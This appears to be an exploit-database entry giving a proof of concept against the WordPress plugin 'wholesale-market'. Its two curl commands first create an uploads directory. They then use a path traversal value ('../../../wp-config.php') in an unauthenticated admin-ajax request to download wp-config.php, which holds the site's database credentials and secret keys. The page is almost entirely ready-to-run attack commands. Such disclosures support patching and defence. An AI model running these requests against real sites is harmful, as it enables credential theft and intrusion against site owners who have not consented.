Share 
## https://sploitus.com/exploit?id=WPEX-ID:7485AD23-6EA4-4018-88B1-174312A0A478
1. Install woocommerce (dependency, no setup required)
2. Install the vulnerable plugin (wholesale-market)
3. Invoke the following curl command to ensure the required uploads directory exists:
   (This creates /var/www/html/wp-content/uploads/wholesale_market_import_error/)

curl -i 'http://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_read_csv'

4. Invoke the following curl command to disclose the contents of the wp-config.php file:

curl -i 'https://example.com/wp-admin/admin-ajax.php?action=ced_cwsm_csv_import_export_module_download_error_log&tab=ced_cwsm_plugin&section=ced_cwsm_csv_import_export_module&ced_cwsm_log_download=../../../wp-config.php'